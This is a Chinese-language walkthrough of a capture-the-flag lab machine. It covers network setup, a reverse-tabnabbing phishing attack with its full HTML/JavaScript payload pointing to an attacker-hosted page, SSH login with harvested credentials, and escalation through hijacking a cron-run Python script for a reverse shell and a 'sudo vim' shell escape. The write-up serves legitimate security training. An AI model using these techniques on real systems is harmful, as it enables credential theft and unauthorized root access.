一、信息收集
扫描不出ip,改一下网卡配置。
重启一下,在启动时按住shift,出现了下面这个界面后按e,然后找到ro,后面写rw single init=/bin/bash。
修改完后按Ctrl + X ,输入ip a查看网卡ens33,然后cd到etc/netplan,ls发现里面有yaml文件,vim修改(注意:要一级一级去cd)
改成ens33,然后重启一下虚拟机,再去找我们的ip。
开放端口有80,22,我们去访问一下。22端口无法访问,80端口就是主页,他让我们去登录账号,但是我们没有,去注册一个试试。
登录进去之后可以发现一个提交框,我们提交什么网站路径,它就会跳转到这个网站。
二、渗透
我们创建两个页面,一个是正常页面,一个是恶意页面。内容如下:
<html>
<body>
<script>
if(window.opener) window.opener.parent.location.replace('http://192.168.13.135:8000/1.html');
</script>
</body>
</html>
<html>
<title>napping</title>
<body>
hello
</body>
</html>
然后在页面提交http://192.168.13.135/1.html,提交完之后点here,就跳转到我们的1.html页面了。
拿到了账号:daniel,密码:C%40ughtm3napping123,解码:C@ughtm3napping123。使用ssh进行连接。
三、提权
我们首先看看用户属于的组,属于administrators组,使用find命令查找一下这个组可以运行的程序。
find / -group administrators 2>/dev/null
查看一下这个py文件。
cat /home/adrian/query.py
从文件里我们可以知道,它往site_status.txt文件内写东西,查看一下这个文件。发现貌似两分钟执行一次。
cat /home/adrian/site_status.txt
我们尝试反弹一个shell,我们首先创建一个sh文件。内容是反弹shell。
修改一下python文件,让他自己执行这个文件,从而获取用户权限。
在kali里监听8000端口,等一会就监听到了。然后查看一下权限,可以运行vim,直接使用vim命令提权。
sudo vim -c ':!/bin/bash'